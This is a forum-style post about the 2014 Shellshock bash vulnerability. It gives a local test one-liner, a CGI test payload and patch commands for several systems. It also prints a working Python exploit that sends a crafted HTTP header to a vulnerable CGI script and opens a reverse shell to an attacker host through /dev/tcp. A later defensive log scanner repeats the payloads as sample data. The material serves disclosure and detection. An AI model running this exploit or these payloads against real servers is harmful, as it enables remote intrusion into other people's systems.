Stephane Chazelas, at the U.K. robotics company SeeByte, found a bug in BASH

https://securityblog.redhat.com/

A quick test to check if you are vulnerable (Debian, Ubuntu, Unix (FreeBSD), ...):

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

If your terminal responds "vulnerable", you are vulnerable.
The problem is the following: the code continues to execute after the ; and here you can inject malicious code ...

Also a CGI test:

wget -U "() { test;};/usr/bin/touch /tmp/VULNERABLE" myserver/cgi-bin/test

You have to update your bash through packages within a couple of days

CentOS : # yum update bash

Debian : # apt-get update && apt-get install --only-upgrade bash

FreeBSD : # portsnap fetch update


https://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-025

-------

Example of an attack that could be performed (in this example, a reverse shell via an HTTP header)

#CVE-2014-6271 cgi-bin reverse shell

import httplib,urllib,sys

if (len(sys.argv)<4):
    print "Usage: %s <host> <vulnerable CGI> <attackhost/IP>" % sys.argv[0]
    print "Example: %s localhost /cgi-bin/test.cgi 10.0.0.1/8080" % sys.argv[0]
    exit(0)

conn = httplib.HTTPConnection(sys.argv[1])
reverse_shell="() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1" % sys.argv[3]

headers = {"Content-type": "application/x-www-form-urlencoded",
    "test":reverse_shell }
conn.request("GET",sys.argv[2],headers=headers)
res = conn.getresponse()
print res.status, res.reason
data = res.read()
print data
Edited by Armaal
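
A defender-side companion to the CGI test above, added here as an example and not part of the original post: it scans Apache combined-format access log lines for Referer or User-Agent values that begin with `() {`, the prefix both payloads in the post rely on. The log lines, addresses and the function name are constructed for illustration; a header the log format does not record (such as the custom `test` header in the script) will not show up in this check.

```python
import re

# Vulnerable bash treated an environment value starting with these four
# characters as a function definition and kept executing what followed it.
FUNC_PREFIX = "() {"

# Apache "combined" format:
# host ident user [time] "request" status bytes "referer" "user-agent"
COMBINED = re.compile(
    r'(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"'
)

def find_shellshock_probes(lines):
    """Return (host, field, value) for each logged header that starts with '() {'."""
    hits = []
    for line in lines:
        m = COMBINED.match(line)
        if not m:
            continue  # not a combined-format line, skip it
        for field in ("referer", "agent"):
            value = m.group(field)
            # CGI copies these headers into HTTP_REFERER / HTTP_USER_AGENT,
            # so only a value that *begins* with the prefix matters.
            if value.startswith(FUNC_PREFIX):
                hits.append((m.group("host"), field, value))
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Sep/2014:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [25/Sep/2014:10:00:07 +0000] "GET /cgi-bin/test HTTP/1.1" 200 0 "-" '
    '"() { test;};/usr/bin/touch /tmp/VULNERABLE"',
    '192.0.2.45 - - [25/Sep/2014:10:00:09 +0000] "GET /cgi-bin/test HTTP/1.1" 500 0 '
    '"() { :;}; echo vulnerable" "curl/7.38.0"',
    # Ordinary JavaScript in a Referer must not be flagged: no leading "() {".
    '192.0.2.46 - - [25/Sep/2014:10:00:12 +0000] "GET /app.js HTTP/1.1" 200 90 '
    '"http://example.test/?f=function(){}" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for host, field, value in find_shellshock_probes(SAMPLE_LOG):
        print(f"{host}\t{field}\t{value}")
```
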
